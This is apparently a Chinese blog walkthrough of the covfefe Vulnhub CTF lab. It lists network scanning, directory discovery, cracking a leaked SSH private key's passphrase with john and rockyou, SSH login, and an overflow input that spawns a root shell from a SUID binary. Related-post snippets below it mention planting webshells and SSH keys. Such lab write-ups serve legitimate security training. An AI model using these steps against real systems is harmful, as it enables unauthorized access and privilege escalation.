covfefe靶场练习

最新推荐文章于 2025-05-30 08:43:45 发布
最新推荐文章于 2025-05-30 08:43:45 发布
阅读量474 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sinat_33211329/article/details/117092394
版权
本文介绍了在covfefe靶场中进行网络扫描和开放服务探测的过程。使用netdiscover和nmap扫描IP,通过dirb寻找隐藏页面,利用ssh2john转换密钥并用john解密,最终通过SSH登录并获取权限,揭示了渗透测试中的关键步骤和技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

对于covfefe靶场,在安装的时候一定要注意网络设置,不然netdiscover可能会扫描不到!!

  • 挖掘开放服务信息    对于只是给定一个对应ip地址的靶场机器,我们需要对其进行扫描,探测开放的服务,渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限
    • 探测靶场
      • sudo su -
      • netdiscover -r 192.168.1.1/24
    • nmap -sV 192.168.1.102

 

  • 探测大端口的信息,对于开放http服务的大端口,可采取http://ip:port/ 的形式访问
    查看源代码获取对应的信息,如果没有flag信息,使用工具探测隐藏页面
    • 对这个服务的隐藏文件进行探测 dirb http://ip:port/
    • 使用ssh2john 将id_rsa密钥信息转换为john可以识别的信息
      • 找到ssh2john  locate ssh2john
      • ssh2john id_rsa > rsacrack
        • python /usr/share/john/ssh2john.py  id_rsa > rsacrack
      • 利用字典解密isacrack信息
        • zcat /usr/share/wordlists/rockyou.txt.gz|john --pipe --rules rsacrack
          • 找到密码 starwars
    • 分离用户名、利用ssh登录服务器
      • ssh -i id_rsa 用户名@ssh 靶场机器IP地址
        • ssh -i id_rsa simon@192.168.1.102
          • 密码 starwars
      • 查看路径 pwd
      • 查看文件 ls
      • cd /root
      • ls
      • cat flag.txt  被拒绝,需要提升权限
      • 查看具有root权限的文件  find / -perm -4000 2>/dev/null
      • 运行c文件 read_message
        • cat read_message.c
          • 看到里面有flag提示
        •  read_message
        • 通过溢出代码访问到加权文件超过20个字符,进入root权限
          • 输入  Simon123456789012345/bin/sh
          • 查看角色信息权限    whoami
        • cat flag.txt

 

 

 

-------------------------------------------------------------------------------------------

孙维恪
关注
CTF—ssh私钥泄露
afei001
09-24 596
练习环境 攻击机:kali 靶机:covfefe(Linux) 攻击机和靶机需要在同一局域网中 目标:获取靶场机器上的flag值 1. 获取靶机IP,测试连通性 root@afei:~# ifconfig eth1 eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 ...
Vulnhub靶机检测不到IP地址
asstart的博客
12-07 6681
vulnhub靶机无法获取IP地址 0x00前言 小编从vulnhub官网下载靶机,准备做学习测试时,使用kali无法检测到靶机的IP,arp-scan、nmap存活主机探测、netdiscover均未检测到靶机的IP地址,因为我们无法获取靶机的IP地址的话就没办法进行下一步。 0x01排查 确保kali与vulnhub靶机同处在一个网络环境。经过确认kali虚拟机和vulnhub靶机均同处在VM...
开源项目 covfefe 使用教程
gitblog_00333的博客
08-30 306
开源项目 covfefe 使用教程 covfefecovfefe项目地址:https://gitcode.com/gh_mirrors/co/covfefe 项目介绍 covfefe 是一个基于 Python 的开源项目,旨在提供一个简单的方式来处理和纠正文本中的拼写错误。该项目由 GitHub 用户 rgbkrk 创建,适用于需要快速纠正文本错误的场景,如社交媒体监控、内容管理系统等。 项目快...
vulnhub靶场covfefe
kukudeshuo的博客
08-17 684
vulnhub靶场covfefe 环境准备 靶机下载地址:https://www.vulnhub.com/entry/covfefe-1,199/ 攻击机:kali(192.168.109.128) 靶机:covfefe(192.168.109.161) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.161 使用nmap扫描查看目标靶机端口开放情况
靶场笔记-covfefe
qq_51951386的博客
10-16 436
下载靶场 靶场下载地址 通过描述可以看出有3个flag 开启靶场和kali 将靶场和kali的网卡都设置为vm8 扫描 使用ifconfig查看本机ip 再用nmap查询本网段有几个IP地址,发现靶场ip 全面扫描靶场ip 发现开放了3个端口,有2是http 80端口 31337端口 虽然显示not found,但可以看出是开放的 使用nikto扫描80端口,没什么有用的信息 扫描31337端口,发现了一些信息 用dirb扫描31337端口 分别查看上面的网址 .bash_history写
靶机渗透测试(covfefe
小小猪的博客
06-05 1006
靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Intermediate) 目标:Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags… flag进度:3/3 渗透流程: 1. 探测靶机ip地址 arp-scan -l .
靶场渗透——cofefe靶场
l1692423065的博客
03-10 1106
也发现了靶场有三个端口是开放的,分别是22,80,31337端口。首先确定kali的IP地址,由于两个靶场都是在NAT模式下,它们处于同一网段。id_rsa就像是私钥钥,id_rsa.pub就像是公钥,并且还都出现了simon这个类似账号的名字。我们发现robots.txt中存在一个新的目录 /taxes,还发现.ssh中有三个不一样的东西。从read_message中,我们能够得到一些信息,分析出来发现这里有着溢出提权的漏洞。我们可以看到,我们已经成功的拿到第一个旗,但是这个好像没有什么用。
靶场covfefe CTF之内网渗透(一)
派大李的博客
11-19 2009
靶场环境和系统:Linux内网 靶机IP:192.168.8.103 kali-ip :192.168.0.102 一、信息收集: 1、主机发现: netdiscover - r 192.168.0.0/24 //获取同网段信息 2、端口扫描: nmap -sV -T4 192.168.0.103 //获取主机端口信息 nmap -T4 -A -v 192.168.0.103 //获取主机详细信息 3、目录扫描: dirb http://192.168.0.103:31337 //获取网站
一、CTF-Web-信息泄露(记录CTF学习)
qq_27920699的博客
12-16 3357
个人CTF学习之路
Kali网络渗透实验四
qq_45746876的博客
12-05 6123
Kali网络渗透实验四前言实验目的系统环境与实验工具实验步骤1.发现目标2.利用NMAP扫描目标主机3.查看目标网站找到有用信息4.利用whatweb探测目标网站使用的CMS模板5.网络搜索wpscan6.使用 Dirb 爆破网站目录7.浏览器访问该目录(路径)8.利用Wireshark分析该数据包9.利用上一步得到的信息进入网站后台10.利用该CMS存在的(插件Plugin)漏洞。11.SSH登录服务器总结 前言 实验目的 实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围
Netdiscover基本使用
热门推荐
weixin_45329009的博客
08-31 1万+
Netdiscover:二层发现工具,拥有主动和被动发现两种方式。 基本用法: 在不知道它的用法之前首先查看它的帮助: 最简单的就是直接输入netdiscover之后就是运行它的默认配置然后扫描局域网中所有的机器这个会非常慢。 1.指定IP段:比如10.10.10.0 选择你监听的网卡:比如eth0 -p 被动模式。默默的侦听指定的网卡以发现别的二层主机 -t ARP包发送间隔。单位毫秒...
使用netdiscover进行主动(被动)扫描
qq_44657899的博客
07-10 2003
主动扫描 主动模式顾名思义就是主动的探测发现网络内主机,但是这种方式往往会引起网络管理员的注意。 命令如下: netdiscover -i eth0 -r 192.168.8.0/24 -i:网卡 -r:网段 被动扫描 被动模式的方法更加隐蔽,但是速度会比较慢,网卡被设置为混杂模式来侦听网络内的arp数据包进行被动式探测,这种方式就需要网络内设备发送arp包才能被探测到。。 命令如下: netdiscover -p -p:被动扫描模式 但是这种方式非常慢。 因为局域网内主机少,所以等了半天没出来
使用netdiscover进行网络发现
weixin_33788244的博客
05-29 1452
概述 脚本小子的日常就是只能介绍一些工具了,今天介绍一个比较简单的工具就是netdiscover了,这个工具最主要就是用来网络发现的 安装 我的环境是在kali下面的,ubuntu的软件源里面也有,所以安装很简单,用包管理器安装就好了apt install netdiscover 使用 因为工具比较简单所以使用也是比较简单的没有什么复杂的参数s首先看一...
关于Vulnhub 靶机ip无法扫描到的解决方法
weixin_63231007的博客
07-12 1803
Vulnhub一些靶机是对应 Virtual Box 的。使用Vmware的话有时候会出现扫描不到靶机ip的情况。在靶机描述里有:VirtualBox 是应对这一挑战的推荐平台。解决方法呢就是。1. 首先重启靶机,在重启界面点击键盘e,找到内核加载配置行,将其修改为单用户启动模式: 2. 将 ro 改为 rw single init=/bin/bash3. Ctrl+x进入单用户模式(root),输入 ip a 命令查看网卡设备名称:是ens334. 查看网络配置文件/etc/network/interf
HTTPS 协议:数据传输安全的坚实堡垒
ruanjiananquan99的博客
05-27 1267
在互联网技术飞速发展的今天,数据在网络中的传输无处不在。从日常浏览网页、在线购物,到企业间的数据交互,每一次信息传递都关乎着用户隐私、企业利益和网络安全。HTTP 协议作为互联网应用层的基础协议,曾经承担着数据传输的重任,但随着网络安全威胁的日益严峻,其不加密、易被窃取篡改的弊端逐渐暴露。而 HTTPS 协议在 HTTP 的基础上增加了 SSL/TLS 加密层,犹如为数据传输穿上了坚固的铠甲,能够对数据进行加密传输,确保数据在传输过程中的保密性、完整性和真实性,成为了保障网络安全的关键技术。​。
数据分类分级的实践与反思:源自数据分析、治理与安全交叉视角的洞察
最新发布
u010872591的博客
05-30 581
但若缺乏对两者特性与适用场景的深刻理解,以及精细化的融合策略设计(例如,如何有效仲裁规则与模型的冲突、如何实现两者间的知识迁移与能力互补),这种融合易陷入“简单叠加”的误区,可能导致系统复杂性剧增,可解释性与可控性下降,最终并未带来预期的价值提升。这一现象可能在许多类似规模的场景中复现。:基于向量空间相似度进行语义理解与判定,虽然在某些场景下表现出优势,但对于细粒度的行业专业术语、隐晦的业务逻辑关联以及跨领域、弱结构化的数据内容,其识别的精确度和稳定性仍有较大提升空间,甚至可能不如经过精细调优的传统规则。
安全生产例题
liangjiao_shou的博客
05-27 1193
安全生产例题
vulhub靶场练习
07-28
回答: Vulhub靶场是一个用于漏洞学习和实践的平台,提供了各种常见漏洞的环境供用户进行实验和学习。在Vulhub靶场中,你可以学习和实践Apache换行解析漏洞(CVE-2017-15715)、Apache多后缀解析漏洞(apache_parsing_vulnerability)以及Apache ssl远程命令执行漏洞(ssi-rce)等漏洞。这些漏洞都有相应的漏洞描述、漏洞原理和漏洞利用方法。其中,Apache换行解析漏洞是指通过利用Apache服务器对换行符的解析不当,导致攻击者可以执行任意命令。Apache多后缀解析漏洞是指Apache服务器对文件后缀解析不当,导致攻击者可以执行任意代码。Apache ssl远程命令执行漏洞是指Apache服务器在处理SSI(Server Side Includes)时存在远程命令执行漏洞。在Vulhub靶场中,你可以通过写入webshell、写入cron或ssh key等文件以及写入jar或jetty.xml等库和配置文件等方法来利用这些漏洞。具体的操作方法可以参考相关的参考资料。 #### 引用[.reference_title] - *1* [vulhub靶场练习——Apache换行解析、多后缀解析、以及ssl远程命令执行漏洞分析](https://blog.youkuaiyun.com/qq_38632151/article/details/103287260)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [vulhub靶场练习 CVE-2016-3088 —— ActiveMQ任意文件写入漏洞](https://blog.youkuaiyun.com/qq_38632151/article/details/102975086)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值